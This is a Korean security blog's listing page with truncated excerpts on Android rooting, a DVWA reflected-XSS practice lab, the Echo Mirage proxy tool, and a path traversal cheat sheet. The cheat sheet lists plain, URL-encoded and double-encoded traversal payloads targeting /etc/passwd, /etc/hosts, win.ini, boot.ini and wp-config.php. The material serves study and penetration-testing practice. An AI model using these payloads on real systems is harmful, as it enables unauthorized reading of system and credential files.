정보보안 스토리

개인적으로 공부하기 위해 정리한 내용입니다. 두서없이 나열되어있으니.. 궁굼한점은 댓글.. Rooting : 안드로이드 운영체제를 탑재한 모바일 기기에서 관리자 권한을 획득하는것 루팅의 목적 1. 시스템 설정 변경 2. OS에대한 Root권한 3. File System 접근 ADB Tool : 안드로이드 장치와 통신하도록 연결 USIM을 사용하는 APP 진단 Wifi Detection - APP에서 Cellural Data와 Wifi Data 사용을 확인하여 Wifi 사용 시 더 이상 서비스를 이용하지 못하도록 App 및 서비스 기능 종료 - Wifi 탐지 기능을 우회하면 기존 Wifi 사용 시와 진단 환경 구축은 같음. - Wifi를 사용해야 진단 PC와 같은 네트워크에서 Network Proxy를 사..

취약한 웹 어플리케이션 DVWA를 통한 취약점 진단 실습입니다. 크로스사이트스크립크(XSS) 공격 입니다. 일단 XSS에 대한 자세한 설명은 전 포스팅인 아래 URL을 참고 부탁드립니다.! https://itinformation.tistory.com/60 XSS(Reflexted) 취약점 중 LOW, MIDDLE, HIGH에 대한 공격 구문 및 반응들을 살펴 보겠습니다. 처음으로 동작원리를 한번 살펴보겠습니다. 제가 "test"를 입력했을때 Hello test라는 문자열이 출력되는 것을보면, 입력한 값을 그대로 출력해주는 동작을 하는 것임을 예상할 수 있습니다. 해당 입력 폼에 XSS구문을 입력해가며, 테스트 해보겠습니다. ---------LOW LEVEL --입력구문 -> test"> 별다른 검증없이 ..

Echo Mirage 사용법 #C/S 프로그램에대한 진단이 필요한 상황으로 어떤 Tool을 사용하는 것이 좋을까 하고 고민하던차에 발견한 Tool이다. TCP 소켓통신에 활용되기에 간단한 변조, 패킷탐지가 가능하다. 1. 용도 - 네트워크 프록시 툴로 DLL injection, Function hooking에 이용한다. - 로컬에서 데이터를 보거나 수정이 가능하며 OpenSSL을 연결하여 평문으로 조회 가능하다. - C/S 프로그램 같은 프로그램 진단 시 Burp 및 Fiddler에서 잡히지 않는 패킷에 대한 조회 및 변조가 가능하다. - TCP 소켓 통신과 같은 프로그램에 대한 진단 및 전송 패킷에 대한 분석이 가능하다. 2. Process > Injection -> Inject : 프로세스(PID 이..

* 파일 다운로드 경로 우회 1) 파일 다운로드 경로 ../../../../etc/passwd ../../../../etc/hosts ../../../../winnt/win.ini ../../../../boot.ini ../../../../wp-config.php 2) 인코딩 ../../../../etc/passwd %2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 ../../../../../../../../../etc/hosts 인코딩 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%68%6f%73%74%73 더블 인코딩 %2..